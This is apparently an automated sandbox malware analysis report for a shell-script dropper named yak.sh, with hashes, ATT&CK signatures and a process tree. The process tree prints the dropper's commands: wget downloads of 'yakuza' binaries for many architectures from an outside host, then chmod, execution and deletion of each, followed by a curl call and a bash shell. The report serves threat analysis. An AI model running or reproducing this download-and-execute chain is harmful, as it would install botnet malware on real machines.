Analysis
-
max time kernel
149s -
max time network
7s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24-11-2024 00:00
Static task
static1
Behavioral task
behavioral1
Sample
yak.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
yak.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
yak.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
yak.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
yak.sh
-
Size
2KB
-
MD5
f50f60f970a5203dad27c480da7b4519
-
SHA1
f50f26900efe72f11c37767b5db9a3916a7c76b4
-
SHA256
ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
-
SHA512
40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 656 chmod 667 chmod 694 chmod 706 chmod 710 chmod 720 chmod 726 chmod 676 chmod 682 chmod 689 chmod 698 chmod 702 chmod 714 chmod -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 659 rm 662 wget 669 yakuza.mipsel 671 rm 647 wget 658 yakuza.mips
Processes
-
/tmp/yak.sh/tmp/yak.sh1⤵PID:645
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mips2⤵
- System Network Configuration Discovery
PID:647
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
PID:656
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- System Network Configuration Discovery
PID:658
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
PID:659
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:662
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
PID:667
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:669
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:671
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.sh2⤵PID:673
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
PID:676
-
-
/tmp/yakuza.sh./yakuza.sh2⤵PID:677
-
-
/bin/rmrm -rf yakuza.sh2⤵PID:678
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.x862⤵PID:680
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/yakuza.x86./yakuza.x862⤵PID:684
-
-
/bin/rmrm -rf yakuza.x862⤵PID:685
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm62⤵PID:687
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵PID:690
-
-
/bin/rmrm -rf yakuza.arm62⤵PID:691
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i6862⤵PID:692
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/yakuza.i686./yakuza.i6862⤵PID:695
-
-
/bin/rmrm -rf yakuza.i6862⤵PID:696
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.ppc2⤵PID:697
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵PID:699
-
-
/bin/rmrm -rf yakuza.ppc2⤵PID:700
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i5862⤵PID:701
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/yakuza.i586./yakuza.i5862⤵PID:703
-
-
/bin/rmrm -rf yakuza.i5862⤵PID:704
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.m68k2⤵PID:705
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵PID:707
-
-
/bin/rmrm -rf yakuza.m68k2⤵PID:708
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm42⤵PID:709
-
-
/bin/chmodchmod +x yakuza.arm42⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/yakuza.arm4./yakuza.arm42⤵PID:711
-
-
/bin/rmrm -rf yakuza.arm42⤵PID:712
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm52⤵PID:713
-
-
/bin/chmodchmod +x yakuza.arm52⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/yakuza.arm5./yakuza.arm52⤵PID:715
-
-
/bin/rmrm -rf yakuza.arm52⤵PID:716
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm72⤵PID:717
-
-
/bin/chmodchmod +x yakuza.arm72⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/yakuza.arm7./yakuza.arm72⤵PID:721
-
-
/bin/rmrm -rf yakuza.arm72⤵PID:722
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.sparc2⤵PID:724
-
-
/bin/chmodchmod +x yakuza.sparc2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/yakuza.sparc./yakuza.sparc2⤵PID:728
-
-
/bin/rmrm -rf yakuza.sparc2⤵PID:729
-
-
/usr/bin/curlcurl -s http://linux-it.abuser.eu/test.php2⤵
- Checks CPU configuration
- Reads runtime system information
PID:731
-
-
/bin/bashbash2⤵PID:732
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1